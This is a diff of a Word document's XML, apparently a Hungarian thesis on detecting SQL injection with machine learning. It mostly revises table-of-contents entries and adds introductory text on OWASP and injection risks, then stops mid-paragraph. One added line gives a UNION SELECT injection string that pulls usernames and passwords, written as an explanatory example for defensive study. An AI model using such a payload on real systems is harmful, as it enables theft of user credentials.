@@ -2340,24 +2613,22 @@
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70106703" w:history="1">
+          <w:hyperlink w:anchor="_Toc70610884" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>2.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2367,55 +2638,56 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>GÉPI TANULÁS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610884 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-              </w:rPr>
-              <w:t>GÉPI TANULÁS</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106703 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>7</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2430,24 +2702,22 @@
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70106704" w:history="1">
+          <w:hyperlink w:anchor="_Toc70610885" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>3.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2457,55 +2727,56 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>PROGRAM FELÉPÍTÉSE</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610885 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-              </w:rPr>
-              <w:t>PROGRAM FELÉPÍTÉSE</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106704 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>7</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2520,24 +2791,22 @@
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70106705" w:history="1">
+          <w:hyperlink w:anchor="_Toc70610886" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>4.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2547,55 +2816,56 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610886 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-              </w:rPr>
-              <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106705 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>7</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2609,66 +2879,65 @@
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70106706" w:history="1">
+          <w:hyperlink w:anchor="_Toc70610887" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Irodalomjegyzék</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610887 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Irodalomjegyzék</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106706 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>8</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2682,66 +2951,65 @@
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70106707" w:history="1">
+          <w:hyperlink w:anchor="_Toc70610888" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Nyilatkozat</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610888 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Nyilatkozat</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106707 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>9</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2755,66 +3023,65 @@
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70106708" w:history="1">
+          <w:hyperlink w:anchor="_Toc70610889" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Köszönetnyilvánítás</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70610889 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Köszönetnyilvánítás</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70106708 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>10</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>14</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:webHidden/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2870,7 +3137,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc70106696"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc70610873"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2967,19 +3234,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Az informatika meglehetősen gyors fejlődése miatt, egy generáció már születésétől kezdve természetesnek vélheti az internethasználatot</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
+        <w:t xml:space="preserve"> Az informatika meglehetősen gyors fejlődése miatt, egy generáció már születésétől kezdve természetesnek vélheti az internethasználatot. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3155,7 +3410,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>, a tanulási módszereket és a kettő ötvözetét egy programon keresztül, amely kimutatja a biztonságtechnikai fenyegetettséget.</w:t>
+        <w:t>, a tanulási módszereket és a kettő ötvözetét egy programon keresztül, amely kimutatja a biztonságtechnikai fenyegetettséget</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az SQL injection irányából</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3190,7 +3457,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc70106697"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc70610874"/>
       <w:r>
         <w:t>SQL INJECTION</w:t>
       </w:r>
@@ -3198,6 +3465,465 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A téma</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>megnevezés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> során meglehetősen </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kevés időt vett igénybe a konkrét </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>biztonsági kockázat kiválasztása.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Szerettem volna egy olyan sérülékenység köré építeni a programom megvalósítását, amelyhez sok példa és ellenpélda tartozik, valamint </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a dokumentáltsága jobb, mint kiváló.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A választásom ez okból esett az első számú </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kockázat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> egy fajtájára.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AZ OWASP (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>The Open Web Application Security Project</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>listáján</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>amely a legkritikusabb biztonsági kockázatokat taglalj</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>njection (magyarul:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> befecskendezés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, injekció</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>áll az első helyen.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ez </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">támadási típus </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a felhasználói input elégtelen mértékű validációjából ered</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, amely lehetővé tesz rosszindulatú SQL utasítások végrehajtását</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amelyek </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>közvetlenül az adatbázisból kérhetnek le adatokat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, emellett adminisztrációs műveleteket hajthatnak végre az adatbázisban, a DBMS fájlban található adott fájl tartalmát helyreállíthatja a rendszerben, és egyes esetekben parancsokat adhat ki az operációs rendszernek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Például az alábbi sor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>' UNION SELECT username, password FROM user</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>s</w:t>
